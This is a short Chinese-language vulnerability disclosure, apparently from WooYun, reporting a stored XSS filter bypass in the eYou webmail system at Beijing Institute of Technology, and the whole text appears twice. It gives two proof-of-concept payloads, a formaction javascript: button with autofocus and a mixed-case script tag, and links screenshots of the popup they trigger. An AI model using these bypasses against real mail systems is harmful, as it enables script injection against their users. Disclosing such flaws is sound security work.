### 简要描述: 找到一个可绕过的存储型XSS方法 ### 详细说明: 依据北京理工大学eYou邮件系统测试, http://wooyun.org/bugs/wooyun-2010-066645 这个帖子中的XSS向量已经全部无效。 经过测试,依然有可以绕过的XSS脚本 ### 漏洞证明: 1.一个按钮 ``` t<!---><form><button+formaction%3djavascript%3aalert(1)+autofocus+/>te ``` 2.直接<script> ``` <!---><scRipT>prompt(1)</scRiPt>te ``` 提交 [<img src="https://images.seebug.org/upload/201501/10192444b7637f7662503204728c4c02a2b74088.jpg" alt="payload.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/10192444b7637f7662503204728c4c02a2b74088.jpg) 弹窗 [<img src="https://images.seebug.org/upload/201501/10192456af1582f71947be1039124a91fe6bf0c5.jpg" alt="prompt.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/10192456af1582f71947be1039124a91fe6bf0c5.jpg)
### 简要描述: 找到一个可绕过的存储型XSS方法 ### 详细说明: 依据北京理工大学eYou邮件系统测试, http://wooyun.org/bugs/wooyun-2010-066645 这个帖子中的XSS向量已经全部无效。 经过测试,依然有可以绕过的XSS脚本 ### 漏洞证明: 1.一个按钮 ``` t<!---><form><button+formaction%3djavascript%3aalert(1)+autofocus+/>te ``` 2.直接<script> ``` <!---><scRipT>prompt(1)</scRiPt>te ``` 提交 [<img src="https://images.seebug.org/upload/201501/10192444b7637f7662503204728c4c02a2b74088.jpg" alt="payload.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/10192444b7637f7662503204728c4c02a2b74088.jpg) 弹窗 [<img src="https://images.seebug.org/upload/201501/10192456af1582f71947be1039124a91fe6bf0c5.jpg" alt="prompt.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/10192456af1582f71947be1039124a91fe6bf0c5.jpg)